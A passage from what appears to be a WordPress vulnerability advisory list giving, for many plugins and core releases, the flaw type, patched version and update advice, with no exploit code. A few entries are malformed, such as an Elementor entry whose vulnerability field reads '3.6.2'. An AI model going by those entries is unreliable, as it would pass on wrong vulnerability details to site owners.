Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PictPress

Vulnerability: Directory Traversal
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Rename Media Files

Vulnerability: Authenticated (Contributor+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Real3D Flipbook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Weather Atlas Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WooCommerce

Vulnerability: Unauthorized Post Meta Creation/Modification
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Wonder Video Embed

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in Theme Preview
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: WP Fastest Cache

Vulnerability: SQL Injection
Patched Version: 0.8.4.9
Recommended Action: Update to version 0.8.4.9, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Menu Settings Update
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: 3.6.2
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Core: WordPress

Vulnerability: Incorrect Authorization for Contributor-level users
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary Payment History Update
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: OoohBoi Steroids for Elementor

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Attachment Deletion
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WP Airbnb Review Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Premium Gallery Manager

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Codup Read Only Admin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.1.8
Recommended Action: Update to version 1.1.1.8, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 4.21.86
Recommended Action: Update to version 4.21.86, or a newer patched version

Plugin: WP User Profile Avatar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Music Store – WordPress eCommerce

Vulnerability: Open Redirect
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: Contact Form – Custom Builder, Payment Form, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.8.176
Recommended Action: Update to version 1.8.176, or a newer patched version

Plugin: Rock Convert

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Unite Gallery Lite

Vulnerability: SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Registrations for the Events Calendar – Event Registration Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Sabre

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Custom Registration Forms <= 3.7.9.2
Patched Version: 3.7.9.3
Recommended Action: Update to version 3.7.9.3, or a newer patched version

Plugin: JustTables – WooCommerce Product Table

Vulnerability: Cross-Site Request Forgery via plugin_activation()
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Thrive Optimize

Vulnerability: Arbitrary Options Update
Patched Version: 1.4.13.3
Recommended Action: Update to version 1.4.13.3, or a newer patched version

Plugin: We’re Open!

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.46
Recommended Action: Update to version 1.46, or a newer patched version

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.19
Recommended Action: Update to version 2.5.19, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: WP Social Comments

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Settings Change
Patched Version: 1.7.3
Recommended Action: Update to version 1.7.3, or a newer patched version

Plugin: Event Manager and Tickets Selling Plugin for WooCommerce – WpEvently – WordPress Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘mep_get_option’ function
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: Contact Form 7

Vulnerability: Arbitrary File Upload via Bypass
Patched Version: 5.3.2
Recommended Action: Update to version 5.3.2, or a newer patched version

Plugin: BuddyPress

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Bulk Delete

Vulnerability: Missing Authorization
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.8.8
Recommended Action: Update to version 6.8.8, or a newer patched version

Plugin: Syncee for Suppliers

Vulnerability: Missing Authorization to Sensitive Information Disclosure
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Axact Author List Widget

Vulnerability: SQL Injection
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: ContentStudio

Vulnerability: Authorization Bypass
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: WP-Optimize – Cache, Compress images, Minify & Clean database to boost page speed & performance

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Download Monitor

Vulnerability: Missing Authorization
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.9.41
Recommended Action: Update to version 1.9.9.41, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[post_type][page]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: Slider Carousel – Image Slider

Vulnerability: Missing Authorization
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Client Portal – Private user pages and login

Vulnerability: Cross-Site Request Forgery via cp_create_private_pages_for_all_users
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.20
Recommended Action: Update to version 2.1.20, or a newer patched version

Plugin: Fusion Engage

Vulnerability: Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: Subscribe2 – Form, Email Subscribers & Newsletters

Vulnerability: Missing Authorization
Patched Version: 10.41
Recommended Action: Update to version 10.41, or a newer patched version

Plugin: Branda – Branda – White Label & Branding, Custom Login Page Customizer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4.9
Recommended Action: Update to version 3.4.9, or a newer patched version

Plugin: Hreflang Manager – Hreflang Implementation for International SEO

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.07
Recommended Action: Update to version 1.07, or a newer patched version

Plugin: Fontiran

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: One User Avatar | User Profile Picture

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.7
Recommended Action: Update to version 2.3.7, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.4.28
Recommended Action: Update to version 3.4.28, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.50
Recommended Action: Update to version 4.0.50, or a newer patched version

Plugin: Awin Data Feed

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_clone_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Snap Pixel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Arbitrary File Deletion
Patched Version: 3.7.27 (3.7 branch only; each later release branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.27, 3.8.27, 3.9.25, 4.0.24, 4.1.24, 4.2.21, 4.3.17, 4.4.16, 4.5.15, 4.6.12, 4.7.11, 4.8.7, 4.9.7

Plugin: WP iCal Availability

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Polylang

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: WooCommerce Pre-Orders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: WP Quick FrontEnd Editor – WordPress Plugin

Vulnerability: Authenticated Settings Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Server Health Stats

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Justified Gallery

Vulnerability: Missing Authorization via ‘dismiss_how_to_use_notice’ and ‘dismiss_notice’
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.7.28 (3.7 branch only; each later release branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.28, 3.8.28, 3.9.26, 4.0.25, 4.1.25, 4.2.22, 4.3.18, 4.4.17, 4.5.16, 4.6.13, 4.7.12, 4.8.8, 4.9.9, 5.0.1

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated Local File Inclusion & SQL Injection
Patched Version: 2.1.57
Recommended Action: Update to version 2.1.57, or a newer patched version

Plugin: Easy Social Icons

Vulnerability: Missing Authorization via cnss_save_ajax_order
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Read and Understood

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.88.5
Recommended Action: Update to version 2.88.5, or a newer patched version

Plugin: Music Store – WordPress eCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.43
Recommended Action: Update to version 1.0.43, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-Site Scripting via range Parameter
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Post Connector Premium

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Privilege Escalation via REST API
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: User Avatar – Reloaded

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WordPress Online Booking and Scheduling Plugin – Bookly

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Name
Patched Version: 21.5.1
Recommended Action: Update to version 21.5.1, or a newer patched version

Plugin: Simple File List

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 6.0.10
Recommended Action: Update to version 6.0.10, or a newer patched version

Plugin: Smart Google Code Inserter

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.5
Recommended Action: Update to version 3.5, or a newer patched version

Plugin: WordPress Landing Pages

Vulnerability: SQL Injection
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Product Expiry for WooCommerce

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Settings Update
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: ContentStudio

Vulnerability: Missing Authorization
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5.5
Recommended Action: Update to version 4.5.5, or a newer patched version

Plugin: All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs – My Sticky Elements

Vulnerability: Missing Authorization
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Landing Page Builder – Free Landing Page Templates

Vulnerability: Local File Inclusion via ‘lpp_template_select’
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: gallery-objects

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: SQL Injection
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: photosmash-galleries

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Missing Authorization to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Unauthenticated Content Injection
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Social Share Buttons by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.9.14
Recommended Action: Update to version 2.9.14, or a newer patched version

Plugin: Powerplay Gallery

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fotobook

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Code Injection
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: Wise Chat

Vulnerability: Reverse Tabnabbing
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: wp-mpdf

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Gwolle Guestbook

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Visual Composer Website Builder

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 27.0
Recommended Action: Update to version 27.0, or a newer patched version

Plugin: Perfect Brands for WooCommerce

Vulnerability: Unauthorized Brand Creation
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: eVision Responsive Column Layout Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: PublishPress Capabilities – User Role Editor, Access Permissions, Admin Menus

Vulnerability: Authenticated SQL Injection
Patched Version: 1.5.9
Recommended Action: Update to version 1.5.9, or a newer patched version

Plugin: wpDataTables – WordPress Data Table, Dynamic Tables & Table Charts Plugin

Vulnerability: SQL Injection
Patched Version: 2.0.12
Recommended Action: Update to version 2.0.12, or a newer patched version

Plugin: Serial Codes Generator and Validator with WooCommerce Support

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.4.15
Recommended Action: Update to version 2.4.15, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3.8
Recommended Action: Update to version 2.3.8, or a newer patched version

Plugin: Notification Bar for WordPress

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media Library Assistant

Vulnerability: Local File Inclusion
Patched Version: 2.82
Recommended Action: Update to version 2.82, or a newer patched version

Plugin: Marker.io – Visual Website Feedback

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.7
Recommended Action: Update to version 1.1.7, or a newer patched version

Plugin: Strong Testimonials

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.31.5
Recommended Action: Update to version 2.31.5, or a newer patched version

Plugin: WP Zoho for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms – CRM, Bigin

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Cache Images

Vulnerability: Cross-Site Request Forgery to Image Upload
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager

Vulnerability: Missing Authorization to Sensitive Key Disclosure/Update
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Display Custom Fields – wpView

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.7
Recommended Action: Update to version 3.4.7, or a newer patched version

Plugin: WP eBay Product Feeds

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: Booster Plus for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Unyson

Vulnerability: Sensitive Information Exposure
Patched Version: 2.7.19
Recommended Action: Update to version 2.7.19, or a newer patched version

Plugin: GoUrl Bitcoin Payment Gateway & Paid Downloads & Membership

Vulnerability: Arbitrary File Upload
Patched Version: 1.4.14
Recommended Action: Update to version 1.4.14, or a newer patched version

Plugin: SEO Change Monitor – Track Website Changes

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Stored Cross-Site Scripting in Admin Dashboard
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Plug your WooCommerce into the largest catalog of customized print products from Helloprint

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Core: WordPress

Vulnerability: Reflected Cross-Site Scripting via Shortcode Previews
Patched Version: 3.7.30 (3.7 branch only; each later release branch has its own fix, listed below)
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.13, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: The Events Calendar

Vulnerability: Missing Authorization
Patched Version: 6.1.3
Recommended Action: Update to version 6.1.3, or a newer patched version

Plugin: Advanced Custom Fields (ACF)

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 5.11
Recommended Action: Update to version 5.11, or a newer patched version

Plugin: BuddyPress xProfile Checkout Manager for WooCommerce

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Cost Calculator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media File Manager

Vulnerability: Directory Traversal to Arbitrary File Relocation
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Newsletter Plugin – Noptin

Vulnerability: Open Redirect
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Live Gold Price & Silver Price Charts Widgets

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 5.36.1
Recommended Action: Update to version 5.36.1, or a newer patched version

Plugin: FrieChat – WordPress Chat Plugin

Vulnerability: Not specified in this entry (affects versions < 1.0.3)
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Core: WordPress

Vulnerability: Server-Side Request Forgery
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Yoast SEO Premium

Vulnerability: Missing Authorization to Zapier Key Reset
Patched Version: 20.5
Recommended Action: Update to version 20.5, or a newer patched version

Plugin: picturesurf-gallery

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Products Tables for WooCommerce. Use constructor to create tables

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 1.0.6.1
Recommended Action: Update to version 1.0.6.1, or a newer patched version

Plugin: Easy US Sales Taxes Add-on for iThemes Exchange

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: WordPress Related Posts

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User IP and Location

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Insufficient Input Validation to Unauthenticated Stored Cross-Site Scripting and Arbitrary Usermeta Update
Patched Version: 7.5.39.7212
Recommended Action: Update to version 7.5.39.7212, or a newer patched version

Plugin: commentator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.3
Recommended Action: Update to version 2.5.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Missing Authorization
Patched Version: 21.3
Recommended Action: Update to version 21.3, or a newer patched version

Plugin: OoohBoi Steroids for Elementor

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Image Upload
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: AFI – The Easiest Integration Plugin

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.76.0
Recommended Action: Update to version 1.76.0, or a newer patched version

Plugin: Really Simple Google Tag Manager (GTM)

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: PowerPress Podcasting plugin by Blubrry

Vulnerability: Cross-Site Scripting
Patched Version: 6.0.1
Recommended Action: Update to version 6.0.1, or a newer patched version

Plugin: Inactive Logout

Vulnerability: Missing Authorization
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 5.5.1
Recommended Action: Update to version 5.5.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: SQL Injection
Patched Version: 3.2.11
Recommended Action: Update to version 3.2.11, or a newer patched version

Plugin: Saphali Woocommerce Lite

Vulnerability: Cross-Site Request Forgery via ‘woocommerce_saphali_page_s_l’
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: DW Question Answer Pro

Vulnerability: Missing Authorization Checks
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Next Page

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Social Icons

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Starter Sites & Templates by Neve

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Download Manager

Vulnerability: Privilege Escalation
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: Responsive Slick Slider WordPress

Vulnerability: Authenticated (Contributor+) Content Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OneLogin SAML SSO

Vulnerability: Authentication Bypass
Patched Version: 2.1.6
